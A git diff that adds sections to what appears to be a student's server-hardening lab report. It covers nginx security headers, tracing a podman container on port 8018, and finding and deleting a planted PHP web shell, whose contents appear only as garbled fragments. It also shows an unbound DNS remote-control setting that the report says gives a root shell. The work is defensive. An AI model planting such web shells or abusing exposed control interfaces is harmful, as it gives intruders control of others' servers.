diff --git a/report/Report.md b/report/Report.md
index 683c5ff..c792283 100644
--- a/report/Report.md
+++ b/report/Report.md
@@ -274,6 +274,90 @@ server {
```
Serves files from `/var/www/html` and proxies requests to `/2048/` to `http://localhost:8018/` where we have a simple game.
+Lets enable xss protection in the nginx configuration.
+
+```bash
+location /2048/ {
+ proxy_pass http://localhost:8018/;
+ proxy_set_header Host $host;
+ # Add security headers
+ add_header X-Frame-Options "SAMEORIGIN";
+ add_header X-Content-Type-Options "nosniff";
+ add_header X-XSS-Protection "1; mode=block";
+}
+```
+
+And deny access to the all `.` files.
+
+```bash
+location ~ /\. {
+ deny all;
+}
+```
+
+The process is run by the `conmon` process.
+
+```bash
+root@ls-2024-9:~# sudo lsof -i :8018
+COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
+conmon 1147 root 5u IPv4 19949 0t0 TCP *:8018 (LISTEN)
+
+root 1147 0.0 0.2 82724 2112 ? Ssl 07:59 0:00 /usr/bin/conmon --api-version 1 -c 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6 -u 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6 -r /usr/bin/crun -b /var/lib/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata -p /run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/pidfile -n 2048 --exit-dir /run/libpod/exits --full-attach -s -l journald --log-level warning --runtime-arg --log-format=json --runtime-arg --log --runtime-arg=/run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/oci-log --conmon-pidfile /run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/conmon.pid --exit-command /usr/bin/podman --exit-command-arg --root --exit-command-arg /var/lib/containers/storage --exit-command-arg --runroot --exit-command-arg /run/containers/storage --exit-command-arg --log-level --exit-command-arg warning --exit-command-arg --cgroup-manager --exit-command-arg systemd --exit-command-arg --tmpdir --exit-command-arg /run/libpod --exit-command-arg --runtime --exit-command-arg crun --exit-command-arg --events-backend --exit-command-arg journald --exit-command-arg container --exit-command-arg cleanup --exit-command-arg --rm --exit-command-arg 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6
+```
+
+It is a podman container.
+
+```bash
+root@ls-2024-9:~# podman ps
+CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
+4d05d4a1a404 docker.io/nejec/2048:latest apache2-foregroun... 2 hours ago Up 2 hours ago 0.0.0.0:8018->22/tcp 2048
+root@ls-2024-9:~#
+```
+
+When going into the container we can see the php reverse shell script.
+
+```bash
+root@ls-2024-9:~# podman exec -it 4d05d4a1a404 bash
+root@4d05d4a1a404:/var/www/html# ls
+app.js assets index.html manifest.json service-worker.js shell.php style.css
+root@4d05d4a1a404:/var/www/html# cat shell.php
+
+
+
+
+
+ CMD
+
+
+
+
+
+
+
+
+ &1'));
+ }
+ ?>
+
+root@4d05d4a1a404:/var/www/html#
+```
+
+Lets remove the file now.
+
+```bash
+podman exec -it 4d05d4a1a404 rm -rf /var/www/html/shell.php
+```
### Already f-up something
@@ -378,3 +462,24 @@ Host ls2024_prep
### DNS
+Problem here is that remote control is enabled and we can use it to get the root shell.
+
+```txt
+root@ls-2024-9:/etc/unbound/unbound.conf.d# cat /etc/unbound/unbound.conf.d/remote-control.conf
+# default unbound control
+remote-control:
+ control-enable: yes
+ control-interface: ::0
+ control-use-cert: no
+```
+
+Lets disable remote control completely. and restart the service.
+
+```bash
+root@ls-2024-9:/etc/unbound/unbound.conf.d# systemctl restart unbound
+```
+
+This is all I found suspicious in the DNS configuration.
+
+
+